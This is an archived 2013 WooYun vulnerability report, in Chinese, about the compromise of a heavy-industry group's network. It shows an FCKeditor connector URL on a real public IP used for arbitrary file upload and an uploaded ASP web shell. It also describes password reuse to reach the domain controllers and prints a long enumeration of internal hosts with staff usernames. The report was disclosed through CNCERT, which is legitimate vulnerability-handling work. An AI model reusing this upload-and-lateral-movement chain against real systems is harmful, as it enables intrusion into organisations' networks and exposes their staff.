某重工业集团任意文件上传+系统通用密码可导致内网沦陷

编号32800
Urlhttp://www.wooyun.org/bug.php?action=view&id=32800
漏洞状态已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞标题某重工业集团任意文件上传+系统通用密码可导致内网沦陷
漏洞类型成功的入侵事件
厂商某重工业集团
白帽子煦阳。
提交日期2013-07-30 14:05:00
公开日期2013-09-13 14:06:00
修复时间(not set)
确认时间2013-08-03 00:00:00
Confirm Spend4
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank13
漏洞简介
我什么都没动. 拒绝查水表...
ps:求审核人员改个霸气的名字 XD
漏洞细节

http://218.5.70.231/manage/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
低版本 遍历 任意上传
http://218.5.70.231/1.asp htc
提权后用当前帐号密码去IPC DC段.
\\dc 杀..
\\dcbak 杀..
然后....
没然后了.. 过程很简单. 我丢几张图就行了吧~
我什么都没动. 拒绝查水表...
Users currently logged on \\172.30.0.1:
A system error has occurred: 53
Users currently logged on \\172.30.0.5:
-- NETSERVER$
-- fong
-- Acronis Agent User
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- IUSR_NETSERVER
-- IUSR_NETSERVER
Users currently logged on \\172.30.0.6:
A system error has occurred: 53
Users currently logged on \\172.30.0.7:
-- FAX-SERVER$
-- Administrator
-- Administrator
-- IUSR_BI_BSC
Users currently logged on \\172.30.0.8:
A system error has occurred: 2138
Users currently logged on \\172.30.0.9:
-- NEWCAIWU$
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.10:
A system error has occurred: 53
Users currently logged on \\172.30.0.11:
-- BETA-SERVER$
-- Administrator
-- Administrator
-- szz
Users currently logged on \\172.30.0.12:
-- CBMS-SERVER$
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.13:
-- FILE-SERVER$
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- UPLOAD
-- Administrator
-- IUSR_FILESERVER-BAK
-- UPLOAD
-- UPLOAD
-- IUSR_FILESERVER-BAK
-- UPLOAD
Users currently logged on \\172.30.0.15:
A system error has occurred: 53
Users currently logged on \\172.30.0.16:
A system error has occurred: 53
Users currently logged on \\172.30.0.17:
A system error has occurred: 53
Users currently logged on \\172.30.0.18:
A system error has occurred: 53
Users currently logged on \\172.30.0.21:
-- DATASERVER$
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.22:
-- BACKUPEXEC$
-- backup
-- IUSR_NETSERVER-BAK
-- backup
-- Administrator
-- backup
-- backup
Users currently logged on \\172.30.0.23:
A system error has occurred: 5
Users currently logged on \\172.30.0.24:
-- FILESERVER-BAK$
-- Administrator
Users currently logged on \\172.30.0.27:
-- EAD$
-- Administrator
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.28:
-- EAD-BAK$
-- Administrator
Users currently logged on \\172.30.0.29:
A system error has occurred: 64
Users currently logged on \\172.30.0.30:
-- DCBAK$
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.32:
-- NETSERVER-BAK$
-- Administrator
Users currently logged on \\172.30.0.33:
-- DLP-SERVER$
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.34:
A system error has occurred: 64
Users currently logged on \\172.30.0.38:
-- BISERVER$
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- Administrator
Users currently logged on \\172.30.0.45:
A system error has occurred: 53
Users currently logged on \\172.30.0.54:
A system error has occurred: 53
Users currently logged on \\172.30.0.58:
A system error has occurred: 53
Users currently logged on \\172.30.0.80:
A system error has occurred: 53
Users currently logged on \\172.30.0.103:
-- -- huangzc
Users currently logged on \\172.30.0.105:
-- -- aigd
Users currently logged on \\172.30.0.108:
-- -- liangh
Users currently logged on \\172.30.0.109:
-- -- wangyl
Users currently logged on \\172.30.0.115:
A system error has occurred: 5
Users currently logged on \\172.30.0.121:
A system error has occurred: 5
Users currently logged on \\172.30.0.175:
A system error has occurred: 53
Users currently logged on \\172.30.0.176:
A system error has occurred: 53
Users currently logged on \\172.30.0.181:
A system error has occurred: 5
Users currently logged on \\172.30.0.202:
A system error has occurred: 53
Users currently logged on \\172.30.0.207:
-- -- chents
Users currently logged on \\172.30.0.215:
-- KE$
-- Amdin
Users currently logged on \\172.30.0.219:
A system error has occurred: 5
Users currently logged on \\172.30.0.220:
-- -- xufan
-- AvastSoftwareUpdater
Users currently logged on \\172.30.0.221:
-- -- zxf
Users currently logged on \\172.30.0.223:
-- -- guoyj
-- ASPNET
Users currently logged on \\172.30.0.224:
-- suqj
--
Users currently logged on \\172.30.0.225:
-- -- zhangchh
Users currently logged on \\172.30.0.226:
-- -- linfs
Users currently logged on \\172.30.0.251:
-- -- wangl
Users currently logged on \\172.30.0.254:
-- DC$
-- Administrator
-- Administrator
-- Administrator
-- Administrator
-- IUSR_DC
-- IUSR_DC
-- IUSR_DC

POC

fck.png


dc.png


shebei.png


修复方案

这个。。

状态信息 2013-07-30: 细节已通知厂商并且等待厂商处理中
2013-08-03: 厂商已经确认,细节仅向厂商公开
2013-08-13: 细节向核心白帽子及相关领域专家公开
2013-08-23: 细节向普通白帽子公开
2013-09-02: 细节向实习白帽子公开
2013-09-13: 细节向公众公开
厂商回复
回应信息危害等级:高漏洞Rank:13 确认时间:2013-08-03 17:18
Showing 1-3 of 3 items.
评论内容评论人点赞数评论时间

感谢 @cncert国家互联网应急中心 感谢CCTV. 感谢MTV. 感谢JPAV..有rank了~ 好开心~

煦阳。02013-08-03 21:15:00

@煦阳。 - - !

疯狗02013-07-30 15:57:00

@xsser @疯狗 果然改得很霸气...

煦阳。02013-07-30 15:24:00